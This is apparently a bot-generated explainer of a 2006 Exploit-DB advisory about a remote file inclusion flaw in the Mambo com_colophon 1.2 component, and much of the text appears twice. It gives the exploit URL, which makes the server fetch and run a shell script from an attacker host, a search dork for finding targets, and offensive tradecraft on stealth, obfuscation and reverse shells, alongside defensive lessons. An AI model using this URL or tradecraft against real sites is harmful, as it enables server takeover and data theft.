By exploitdb papers bot•July 29, 2006•

papers

Mambo Component 'com_colophon' 1.2 RFI Exploit Explained

What this paper is

This paper describes a Remote File Inclusion (RFI) vulnerability in the Mambo CMS (Content Management System) component com_colophon version 1.2. It details how an attacker can exploit this vulnerability to execute arbitrary commands on the web server.

Simple technical breakdown

The vulnerability lies in how the admin.colophon.php file handles user-supplied input for the $mosConfig_lang variable. This variable is used to construct a file path that is then included by the require_once function. By providing a URL pointing to a malicious PHP file instead of a legitimate language file, an attacker can trick the server into downloading and executing their code.

Complete code and payload walkthrough

The provided exploit description is concise and focuses on the vulnerable code snippet and the exploit URL. There is no explicit code or payload provided in the raw text, other than the URL structure.

Vulnerable Code Snippet:
```
require_once("$mosConfig_absolute_path/components/com_colophon/language/$mosConfig_lang.php");
```
- Purpose: This line attempts to include a language file based on the value of $mosConfig_lang.
- Inputs: $mosConfig_absolute_path (expected to be the Mambo installation path) and $mosConfig_lang (expected to be a language code like 'en' or 'it').
- Behavior: It constructs a full path to a language file. If the file doesn't exist, require_once will produce a warning but not necessarily stop execution. However, if the path is controlled by an attacker and points to a remote URL, PHP's allow_url_include and allow_url_fopen settings can lead to the remote file being fetched and executed.
- Output: If successful, the code from the included file is executed. If not, a warning might be generated.
Exploit URL Structure:
```
http://www.site.it/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://evalsite/shell.php?
```
- Purpose: This URL demonstrates how to trigger the RFI vulnerability.
- Breakdown:
  - http://www.site.it/administrator/components/com_colophon/admin.colophon.php: This is the target vulnerable script on the victim's website.
  - ?mosConfig_absolute_path=: This part of the URL injects a value into the $mosConfig_absolute_path variable within the vulnerable script.
  - http://evalsite/shell.php?: This is the attacker-controlled URL. The attacker would host a file named shell.php on evalsite (their own server). This shell.php file would contain the malicious code they want to execute on the victim's server. The trailing ? is often used to ensure that any parameters passed to shell.php are not misinterpreted by the RFI mechanism, or to ensure that the included file is treated as a PHP file.
Mapping:
- require_once("$mosConfig_absolute_path/components/com_colophon/language/$mosConfig_lang.php"); -> Vulnerable Inclusion Logic
- mosConfig_absolute_path=http://evalsite/shell.php? -> RFI Payload Injection Point
Shellcode/Payload: No specific shellcode is provided in the raw text. The "payload" is the URL itself, which instructs the vulnerable server to fetch and execute a remote PHP script. The content of shell.php would be the actual command execution payload, which could be anything from a simple command execution backdoor to a more complex web shell.

Practical details for offensive operations teams

Required Access Level: Network access to the target web server is required. No local access or authentication to the Mambo administration panel is needed for this specific RFI.
Lab Preconditions:
- A Mambo 1.2 installation (or a version with the same vulnerable code in admin.colophon.php).
- The com_colophon component installed.
- PHP configured with allow_url_include = On and allow_url_fopen = On. These are critical prerequisites for RFI to work. If allow_url_include is off, RFI is generally not possible.
- An attacker-controlled web server to host the malicious shell.php file.
Tooling Assumptions:
- A web browser to craft and send the exploit URL.
- A simple HTTP server (e.g., Python's SimpleHTTPServer, netcat, or a dedicated web server) to host the shell.php payload.
- A text editor to create the shell.php file.
Execution Pitfalls:
- PHP Configuration: The most significant pitfall is the allow_url_include and allow_url_fopen PHP settings. If these are disabled on the target server, the exploit will fail.
- Web Application Firewalls (WAFs): Modern WAFs might detect the RFI pattern in the URL and block the request.
- URL Encoding: Special characters in the URL might need proper encoding.
- Path Traversal/Sanitization: While this exploit relies on direct inclusion, some CMS versions might have input sanitization that could prevent this specific RFI. However, the paper implies direct inclusion is possible.
- $mosConfig_absolute_path Variable: The exploit assumes $mosConfig_absolute_path is not being sanitized or overridden in a way that prevents the injected URL from being used. The paper suggests it's directly used in the require_once path.
Tradecraft Considerations:
- Stealth: Using a less common domain for the evalsite and a less obvious filename for shell.php can improve stealth.
- Payload Obfuscation: If the shell.php is detected, obfuscating the PHP code within it can help bypass basic signature-based detection.
- Post-Exploitation: The shell.php would typically contain code to establish a reverse shell, download further tools, or exfiltrate data.

Where this was used and when

Context: This vulnerability was found in Mambo CMS, a precursor to Joomla!. It was likely used against websites running Mambo version 1.2.
Approximate Years/Dates: The exploit was published on July 29, 2006. Therefore, its active exploitation period would have been around 2006 and shortly thereafter. Mambo was popular in the early to mid-2000s before Joomla! became dominant.

Defensive lessons for modern teams

Input Validation and Sanitization: Always validate and sanitize all user-supplied input, especially when it's used in file paths, database queries, or system commands. Never trust external input.
Secure PHP Configuration: Disable allow_url_include and allow_url_fopen in php.ini unless absolutely necessary and with extreme caution. These settings are a common source of RFI vulnerabilities.
Dependency Management: Keep all CMS and components updated to the latest secure versions. Vulnerabilities like this are typically patched in later releases.
Web Application Firewalls (WAFs): Deploy and configure WAFs to detect and block common attack patterns, including RFI attempts.
Least Privilege: Run web applications with the minimum necessary privileges to limit the impact of a successful compromise.
File Inclusion Best Practices: If file inclusion is necessary, use whitelisting of allowed files and paths rather than blacklisting potentially malicious ones.

ASCII visual (if applicable)

+-------------------+      +---------------------------+      +-----------------------+
| Attacker's Server |----->| Victim's Web Server (PHP) |----->| Malicious Shell Script|
| (evalsite)        |      | (Mambo 1.2)               |      | (shell.php)           |
|                   |      |                           |      |                       |
| - Hosts shell.php |      | - admin.colophon.php      |      | - Contains commands   |
+-------------------+      | - Vulnerable to RFI       |      |   to execute          |
                           +---------------------------+      +-----------------------+
                                       ^
                                       |
                                       | Exploitation URL:
                                       | http://www.site.it/admin...
                                       | ?mosConfig_absolute_path=http://evalsite/shell.php?

Source references

Paper ID: 2085
Paper Title: Mambo Component 'com_colophon' 1.2 - Remote File Inclusion
Author: Drago84
Published: 2006-07-29
Keywords: PHP, webapps
Paper URL: https://www.exploit-db.com/papers/2085
Raw URL: https://www.exploit-db.com/raw/2085

Original Exploit-DB Content (Verbatim)

###########  Command Mambo Colophon =<1.2 ##by #Drago84#########

      Found By Drago84
Exclusive Security Italian Security

  This bug allows a remote atacker to execute commands via rfi

page:
  admin.colophon.php

bug:
 require_once("$mosConfig_absolute_path/components/com_colophon/language/$mosConfig_lang.php");

path:
add in admin.colophon.php
defined( '_VALID_MOS' ) or die( 'hacking attemp.' );

dork: inurl:com_colophon

expl:
htttp:/www.site.it/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://evalsite/shell.php?

# milw0rm.com [2006-07-29]

Simple technical breakdown

Complete code and payload walkthrough

Vulnerable Code Snippet:

require_once("$mosConfig_absolute_path/components/com_colophon/language/$mosConfig_lang.php");

Purpose: This line attempts to include a language file based on the value of $mosConfig_lang.
Inputs: $mosConfig_absolute_path (expected to be the Mambo installation path) and $mosConfig_lang (expected to be a language code like 'en' or 'it').
Behavior: It constructs a full path to a language file. If the file doesn't exist, require_once will produce a warning but not necessarily stop execution. However, if the path is controlled by an attacker and points to a remote URL, PHP's allow_url_include and allow_url_fopen settings can lead to the remote file being fetched and executed.
Output: If successful, the code from the included file is executed. If not, a warning might be generated.

Exploit URL Structure:

http://www.site.it/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://evalsite/shell.php?

Purpose: This URL demonstrates how to trigger the RFI vulnerability.
Breakdown:
- http://www.site.it/administrator/components/com_colophon/admin.colophon.php: This is the target vulnerable script on the victim's website.
- ?mosConfig_absolute_path=: This part of the URL injects a value into the $mosConfig_absolute_path variable within the vulnerable script.
- http://evalsite/shell.php?: This is the attacker-controlled URL. The attacker would host a file named shell.php on evalsite (their own server). This shell.php file would contain the malicious code they want to execute on the victim's server. The trailing ? is often used to ensure that any parameters passed to shell.php are not misinterpreted by the RFI mechanism, or to ensure that the included file is treated as a PHP file.

Mapping:

require_once("$mosConfig_absolute_path/components/com_colophon/language/$mosConfig_lang.php"); -> Vulnerable Inclusion Logic
mosConfig_absolute_path=http://evalsite/shell.php? -> RFI Payload Injection Point

Shellcode/Payload: No specific shellcode is provided in the raw text. The "payload" is the URL itself, which instructs the vulnerable server to fetch and execute a remote PHP script. The content of shell.php would be the actual command execution payload, which could be anything from a simple command execution backdoor to a more complex web shell.

Practical details for offensive operations teams

Required Access Level: Network access to the target web server is required. No local access or authentication to the Mambo administration panel is needed for this specific RFI.

Lab Preconditions:

A Mambo 1.2 installation (or a version with the same vulnerable code in admin.colophon.php).
The com_colophon component installed.
PHP configured with allow_url_include = On and allow_url_fopen = On. These are critical prerequisites for RFI to work. If allow_url_include is off, RFI is generally not possible.
An attacker-controlled web server to host the malicious shell.php file.

Tooling Assumptions:

A web browser to craft and send the exploit URL.
A simple HTTP server (e.g., Python's SimpleHTTPServer, netcat, or a dedicated web server) to host the shell.php payload.
A text editor to create the shell.php file.

Execution Pitfalls:

PHP Configuration: The most significant pitfall is the allow_url_include and allow_url_fopen PHP settings. If these are disabled on the target server, the exploit will fail.
Web Application Firewalls (WAFs): Modern WAFs might detect the RFI pattern in the URL and block the request.
URL Encoding: Special characters in the URL might need proper encoding.
Path Traversal/Sanitization: While this exploit relies on direct inclusion, some CMS versions might have input sanitization that could prevent this specific RFI. However, the paper implies direct inclusion is possible.
$mosConfig_absolute_path Variable: The exploit assumes $mosConfig_absolute_path is not being sanitized or overridden in a way that prevents the injected URL from being used. The paper suggests it's directly used in the require_once path.

Tradecraft Considerations:

Stealth: Using a less common domain for the evalsite and a less obvious filename for shell.php can improve stealth.
Payload Obfuscation: If the shell.php is detected, obfuscating the PHP code within it can help bypass basic signature-based detection.
Post-Exploitation: The shell.php would typically contain code to establish a reverse shell, download further tools, or exfiltrate data.

Where this was used and when

Context: This vulnerability was found in Mambo CMS, a precursor to Joomla!. It was likely used against websites running Mambo version 1.2.

Approximate Years/Dates: The exploit was published on July 29, 2006. Therefore, its active exploitation period would have been around 2006 and shortly thereafter. Mambo was popular in the early to mid-2000s before Joomla! became dominant.

Defensive lessons for modern teams

Input Validation and Sanitization: Always validate and sanitize all user-supplied input, especially when it's used in file paths, database queries, or system commands. Never trust external input.

Secure PHP Configuration: Disable allow_url_include and allow_url_fopen in php.ini unless absolutely necessary and with extreme caution. These settings are a common source of RFI vulnerabilities.

Dependency Management: Keep all CMS and components updated to the latest secure versions. Vulnerabilities like this are typically patched in later releases.

Web Application Firewalls (WAFs): Deploy and configure WAFs to detect and block common attack patterns, including RFI attempts.

Least Privilege: Run web applications with the minimum necessary privileges to limit the impact of a successful compromise.

File Inclusion Best Practices: If file inclusion is necessary, use whitelisting of allowed files and paths rather than blacklisting potentially malicious ones.

ASCII visual (if applicable)

Original Exploit-DB Content (Verbatim)

########### Command Mambo Colophon =<1.2 ##by #Drago84######### Found By Drago84 Exclusive Security Italian Security This bug allows a remote atacker to execute commands via rfi page: admin.colophon.php bug: require_once("$mosConfig_absolute_path/components/com_colophon/language/$mosConfig_lang.php"); path: add in admin.colophon.php defined( '_VALID_MOS' ) or die( 'hacking attemp.' ); dork: inurl:com_colophon expl: htttp:/www.site.it/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://evalsite/shell.php? # milw0rm.com [2006-07-29]